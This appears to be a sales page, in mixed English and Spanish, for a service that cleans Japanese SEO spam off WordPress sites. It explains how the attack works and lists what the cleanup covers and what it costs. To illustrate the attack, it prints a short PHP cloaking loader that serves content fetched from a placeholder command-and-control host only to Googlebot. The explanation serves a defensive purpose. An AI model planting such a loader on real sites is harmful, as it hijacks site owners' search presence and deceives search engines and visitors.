t threatover

// JAPANESE SEO SPAM · CLOAKED · CLEANED

Japanese spam in your
Google results? Eliminado.

Manual removal of the Japanese SEO spam injection. File-and-database cleanup. Sitemap purge. Entry vector identified. Reconsideration requests submitted. Flat $279.

§ 01 — MECHANISM

What 'Japanese SEO spam' is, technically.

An attacker plants a PHP loader on your site (usually in wp-content/plugins/ or wp-content/uploads/). The loader generates thousands of synthetic pages with Japanese keywords and Japanese product titles. It rewrites your sitemap so Googlebot finds them. Real visitors never see the spam — the loader checks the User-Agent and serves your normal site to humans.

By the time you notice, Google has indexed hundreds or thousands of Japanese-language URLs on your domain. Search Console emails a security warning. Rankings drop. The 'Hacked: Content injection' label appears in Search Console.

// TYPICAL CLOAKING LOADER
01 <?php
02 // Serve spam only to Googlebot. Real users see the normal site.
03 if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {
04     $payload = file_get_contents('https://spam-c2.example/jp/' . $_SERVER['REQUEST_URI']);
05     echo $payload;
06     exit;
07 }

§ 02 — WHAT WE REMOVE

Every place this infection hides.

  • [ FILE LOADERS ]

    Obfuscated PHP in plugins, mu-plugins, themes, and uploads. We read the diffs, not the filenames.

  • [ DATABASE ]

    Spam content injected into wp_posts, malicious autoloaded wp_options entries, suspect wp_usermeta.

  • [ SITEMAP ]

    Generated synthetic sitemap entries removed; clean sitemap regenerated and resubmitted to Search Console.

  • [ HTACCESS ]

    .htaccess and nginx rewrite rules that redirect Googlebot or specific paths — reverted.

  • [ ADMIN USERS ]

    Sleeper administrator accounts created by the loader — removed. All remaining admin secrets rotated.

  • [ ENTRY VECTOR ]

    Vulnerable plugin or stolen credential identified and closed. Without this step, the same hole gets reused within weeks.

§ PRICE

Flat $279. One-time. Per site.

[ RESCUE ]

$279

PLANO · ÚNICO · POR SITIO

Limpieza manual, identificación del vector, informe forense escrito. Garantía de reinfección 30 días.

Iniciar limpieza →

[ SHIELD ]

$29 / mo

POR SITIO · CANCELA CUANDO QUIERAS

Monitorización continua, endurecimiento, una limpieza al año incluida.

Protégete →

¿Sitio comprometido? Abre un encargo.

Send us what you know. You get a triage and a fixed quote in return — no obligation.

Abrir formulario →